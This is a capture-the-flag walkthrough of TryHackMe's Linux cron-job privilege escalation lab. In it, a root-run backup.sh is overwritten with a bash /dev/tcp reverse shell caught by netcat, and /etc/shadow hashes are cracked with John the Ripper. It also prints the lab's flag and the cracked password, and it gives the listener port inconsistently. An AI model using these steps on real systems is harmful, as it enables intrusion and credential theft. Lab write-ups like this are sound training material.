This article discusses the solution for TryHackMe's Linux Privilege Escalation Cron Jobs task so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Privilege Escalation Cron Jobs Solution
Notes:
Check
etc/crontabs
for script files that are run as root but the current user can access. Can change the script for reverse shell.Check
etc/crontabs
for script files that have been deleted already but not removed from crontabs. Can create the same file.- Check path. If home/{user} included then can create in currrent users home folder. Also check if user has write permission on other path address
tar, 7z, rsync etc. can be exploited using their wildcard feature
How many user-defined cron jobs can you see on the target system?
- Run
cat /etc/crontab
Answer: 4
What is the content of the flag5.txt file?
We can see in the crontabs there is a file /home/karen/backup.sh. Run the
cat /home/karen/
backup.sh
to check its contents.We also discover that we have access to the file.
Modify this file to cp flag5.txt to launch a reverse shell
Let's launch a listener at port 9999 in our kali machine.
nc -lvnp 1234
Let's locate our serve IP by running
ifconfig
in our kali machine get theinet
oftun0
Run
vim /home/karen/
backup.sh
and modify the code to following to create a reverse shell.#!/bin/bash bash -i >& /dev/tcp/{tun0 inet ip}/1234 0>&1
Run
chmod +x
backup.sh
Wait on the listener terminal until reverse shell is activated.
- Run
cat /home/ubuntu/flag5.txt
Answer: THM-383000283
What is Matt's password?
- Create a local file
passwd.txt
andshadow.txt
and copy the content from the target machine's/etc/passwd
and/etc/shadow
.
Unshadow the files:
unshadow passwd.txt shadow.txt > passwords.txt
Run john the ripper on
passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Answer: 123456
Until next time. Keep learning.
Stay stoked and code. :)
I hope you can voluntarilyBuy Me A Coffeeif you found this article useful and give additional support for me to continue sharing more content for the community. :)
Thank you very much. :)